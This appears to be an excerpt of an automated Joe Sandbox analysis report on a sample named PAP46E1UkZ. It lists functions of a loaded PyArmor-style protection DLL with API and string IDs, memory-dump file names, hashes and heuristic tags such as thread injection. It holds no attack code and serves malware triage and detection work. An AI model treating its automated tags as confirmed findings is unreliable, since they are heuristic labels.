                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c79e891e9dfb705a482fa7f3e1f59f1b2195da874a9a0b4ab00c82459b8c0db4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AE359B0B19716E5EA04DB12FD1079C23A6BB89BC5F444326990E1B3A9DF7CF646C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A05F90 Relevance: 179.1, APIs: 86, Strings: 16, Instructions: 606stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc$_errnofree$_accessgetenvmemcpystrerror
                                                                                                                                                                                                                              • String ID: %s$%s%c%s$%s%c%s%c%s$%s,%d,0x%x,$.pyarmor$HOME$PYARMOR_HOME$PYARMOR_LICENSE$USERPROFILE$\$\$license.c$license.lic$product.key$pyshield.lic$pytransform.log
                                                                                                                                                                                                                              • API String ID: 3633859503-4198341668
                                                                                                                                                                                                                              • Opcode ID: dea1a56f0194d153486425f0926c0663f378dd83e285a3f65df17648098f89ba
                                                                                                                                                                                                                              • Instruction ID: ac971521b5d3ce2f6c27946d66720d81ffc14d855e4952a9b90aaf54d46cbfa1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dea1a56f0194d153486425f0926c0663f378dd83e285a3f65df17648098f89ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D32706071970AD9EA05DB52FE5039D23A6BB89BC9F8442269D0E1736DEF3CF505C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0D550 Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 96COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 70A05F90: getenv.MSVCRT ref: 70A06026
                                                                                                                                                                                                                              • _errno.MSVCRT ref: 70A0D5D1
                                                                                                                                                                                                                                • Part of subcall function 70A0A580: free.MSVCRT ref: 70A0A70D
                                                                                                                                                                                                                                • Part of subcall function 70A0A580: free.MSVCRT ref: 70A0A71C
                                                                                                                                                                                                                                • Part of subcall function 70A0A580: strncmp.MSVCRT ref: 70A0A744
                                                                                                                                                                                                                              • free.MSVCRT ref: 70A0D5AF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$_errnogetenvstrncmp
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$license.c$license.lic$product.key$pytransform.log
                                                                                                                                                                                                                              • API String ID: 2333459679-2554675036
                                                                                                                                                                                                                              • Opcode ID: 5adfb959bff474ca3f5af1ba6c6ba627b0c29b32ce4397753ddae2bdcc758b77
                                                                                                                                                                                                                              • Instruction ID: fad2624eba66c6a2f6844de90163a372c71022011a0cde312bab704a725c98e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5adfb959bff474ca3f5af1ba6c6ba627b0c29b32ce4397753ddae2bdcc758b77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9931A172B2871699FE109B62FD1075D23A1AB89BC4F444226DD0E1776CEF3CF5468306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A049D0 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 96COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fprintf$fputc$_errnofclosefreemallocmemcpy
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$protect.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 4098992662-1235383041
                                                                                                                                                                                                                              • Opcode ID: cea3eec7316f32f8d49e35e07b46f15198093a43bb8a8980b5e3a3621d3f9859
                                                                                                                                                                                                                              • Instruction ID: 0c4094d107cfae187ec12e84b18d977824f35a7ce13f573ead7c3c89c412cb07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cea3eec7316f32f8d49e35e07b46f15198093a43bb8a8980b5e3a3621d3f9859
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731E8517082C29EEB119B36B9507AD7B60EF46BC8F5842659E8D0732FEE2CF402C309
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A943E0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File_errno$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                              • String ID: $@$@
                                                                                                                                                                                                                              • API String ID: 896588047-3743272326
                                                                                                                                                                                                                              • Opcode ID: ab37dd820a5487154df6641bf13eea15c02a9098043e3f1f7df84ee547d2824a
                                                                                                                                                                                                                              • Instruction ID: b0ddc3f8f4b9117d2f91b692adcebcb137f84f5857593b5cf3cde9af5e97572e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab37dd820a5487154df6641bf13eea15c02a9098043e3f1f7df84ee547d2824a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2410273B3165087E7225B56B900B4D63A9B789FB4F4A43259E7A073D8EBBCCD408304
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A2F820 Relevance: 18.5, APIs: 2, Strings: 10, Instructions: 483COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                              • String ID: in != NULL$key != NULL$key != NULL$key != NULL$ltc_mp.name != NULL$ltc_mp.name != NULL$size > 0$src/pk/rsa/rsa_free.c$src/pk/rsa/rsa_import.c$src/pk/rsa/rsa_make_key.c
                                                                                                                                                                                                                              • API String ID: 1294909896-606996012
                                                                                                                                                                                                                              • Opcode ID: 588963df0f598af30c7b2728f7015f462d4dd17d7f7c2b60ceb84686aa7b9b02
                                                                                                                                                                                                                              • Instruction ID: bac60fc2f864633cdf5b63a2c6f786dc87e29815a6fb6368053a44eed9c78739
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 588963df0f598af30c7b2728f7015f462d4dd17d7f7c2b60ceb84686aa7b9b02
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D224772208B85C6D7608F22F45478EB7A5F388B89F504126EE8E87B6CDF79D585CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0D750 Relevance: 15.6, APIs: 4, Strings: 6, Instructions: 579stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$strlenstrncmp
                                                                                                                                                                                                                              • String ID: __main__$__mp_main__$__parents_main__$__spec__$frame$obfmode.c
                                                                                                                                                                                                                              • API String ID: 2569063720-2363144754
                                                                                                                                                                                                                              • Opcode ID: 170788793fc07fead94b92c10be248984f836fd6b40e5c60b302769a886e3700
                                                                                                                                                                                                                              • Instruction ID: 187768a5472b5509dee448436da67f5f7feb250c383ce60fe6b6c4fb96e2180d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 170788793fc07fead94b92c10be248984f836fd6b40e5c60b302769a886e3700
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB32CD72A09648C6EB158B21F94036D23A2F799BD4F44462ACD0F1776CFB7CE985C340
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A329D0 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 127COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: callocfree
                                                                                                                                                                                                                              • String ID: in != NULL$inlen != 0$public_key_len != NULL$src/pk/asn1/der/sequence/der_decode_subject_public_key_info.c
                                                                                                                                                                                                                              • API String ID: 306872129-3913984646
                                                                                                                                                                                                                              • Opcode ID: ce3cf6be930fc6333ae8d8719c862b0e2b8791e6a9447f51c57337a64822b4b3
                                                                                                                                                                                                                              • Instruction ID: daa7a64e5722232c20c0c5f50e078eb651ad8c2f7da50327ae45d0c205372ccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce3cf6be930fc6333ae8d8719c862b0e2b8791e6a9447f51c57337a64822b4b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D4173323182C08AEB718F52E8507CEB7A5F3C8384F90422AAA8947B58DBBDD545CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A32860 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • src/pk/asn1/der/sequence/der_decode_sequence_multi.c, xrefs: 70A329B2
                                                                                                                                                                                                                              • in != NULL, xrefs: 70A329B9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: in != NULL$src/pk/asn1/der/sequence/der_decode_sequence_multi.c
                                                                                                                                                                                                                              • API String ID: 0-85593093
                                                                                                                                                                                                                              • Opcode ID: 868ed29db32a78e6bbee8117e0ac6bea4d533e4e39ef16561a0a243d92ad6ea6
                                                                                                                                                                                                                              • Instruction ID: 222c647e280d6f47e01988559bbf4a1bbcaedbfa8691f65987440ad81981d39d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 868ed29db32a78e6bbee8117e0ac6bea4d533e4e39ef16561a0a243d92ad6ea6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A310432B147848AEB15CF19E811B8DB266E799BD8F944028EE4E47B5CDB38D985CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A702F0 Relevance: 6.0, APIs: 4, Instructions: 38threadinjectionCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Thread$ContextCurrent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 195563550-0
                                                                                                                                                                                                                              • Opcode ID: cba03cac11f85d0116ead9ecacf7429cc02e410017cf2b60fa8361641a08cb35
                                                                                                                                                                                                                              • Instruction ID: cb033ec50b3df19b919f67babef06e0dc06218f53cace8620939e606cea4e4e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba03cac11f85d0116ead9ecacf7429cc02e410017cf2b60fa8361641a08cb35
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C111232508744C6EB518B25F91871AB2A1F388794F549639D6C9CA6ACCFBCC189CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A95A60 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: ae0fa999ff329b0ddfb9205d069cd7994713fb6f430326ff046f14b7f9d882fc
                                                                                                                                                                                                                              • Instruction ID: 33413f93e5334ee1fa4a87681bc73c056ccd384c2b5af8f325ce3699f493aa23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae0fa999ff329b0ddfb9205d069cd7994713fb6f430326ff046f14b7f9d882fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF0FE703351318DEF320132D69EB5D29E96B067D0EA4070B991706EACD15FC6859F0E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A700F0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
